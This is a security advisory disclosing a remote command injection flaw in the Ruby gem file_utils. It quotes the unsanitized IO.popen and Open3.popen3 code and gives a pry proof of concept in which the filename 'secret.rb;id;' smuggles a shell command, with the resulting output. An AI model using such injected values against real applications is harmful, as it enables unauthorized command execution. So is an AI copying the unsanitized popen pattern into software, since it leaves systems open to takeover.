TITLE: Remote Command Injection in file_utils ruby gem DOWNLOAD: http://rubygems.org/gems/file_utils CVE: N/A DESCRIPTION: If the execute method is used in a rails app to take input from a remote user commands can be injected into shell. User input is not sanitized before being passed to popen(). CODE: 55 def execute command 56 IO.popen(command).each_line do |line| 57 puts line 58 end 59 end 60 61 def execute_command(command) 62 output = nil 63 error = nil 64 status = nil 65 66 Open3.popen3(command) do |_, stdout, stderr| 67 output = stdout.readlines 68 error = stderr.readlines 69 status = $? 70 end PoC: larry@sp0rk:~$ pry -r 'file_utils/file_utils' [1] pry(main)> include FileUtils => Object [2] pry(main)> def process_file filename [2] pry(main)* execute ("pdf2ps #{filename} outfile.ps") [2] pry(main)* end => nil [3] pry(main)> filename = "secret.rb;id;" <-- user supplied input => "secret.rb;id;" [4] pry(main)> process_file (filename) Error: /undefined in password <-- secret.rb was just a file laying around from an other PoC Operand stack: Execution stack: %interp_exit .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- --nostringval-- --nostringval-- false 1 %stopped_push 1910 1 3 %oparray_pop 1909 1 3 %oparray_pop 1893 1 3 %oparray_pop 1787 1 3 %oparray_pop --nostringval-- %errorexec_pop .runexec2 --nostringval-- --nostringval-- --nostringval-- 2 %stopped_push --nostringval-- Dictionary stack: --dict:1167/1684(ro)(G)-- --dict:0/20(G)-- --dict:77/200(L)-- Current allocation mode is local Current file position is 9 GPL Ghostscript 9.06: Unrecoverable error, exit code 1 uid=1000(larry) gid=1000(larry) groups=1000(larry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),106(lpadmin),117(sambashare) sh: 1: outfile.ps: not found => # [5] pry(main)> AUTHOR: Larry W. Cashdollar (@_larry0)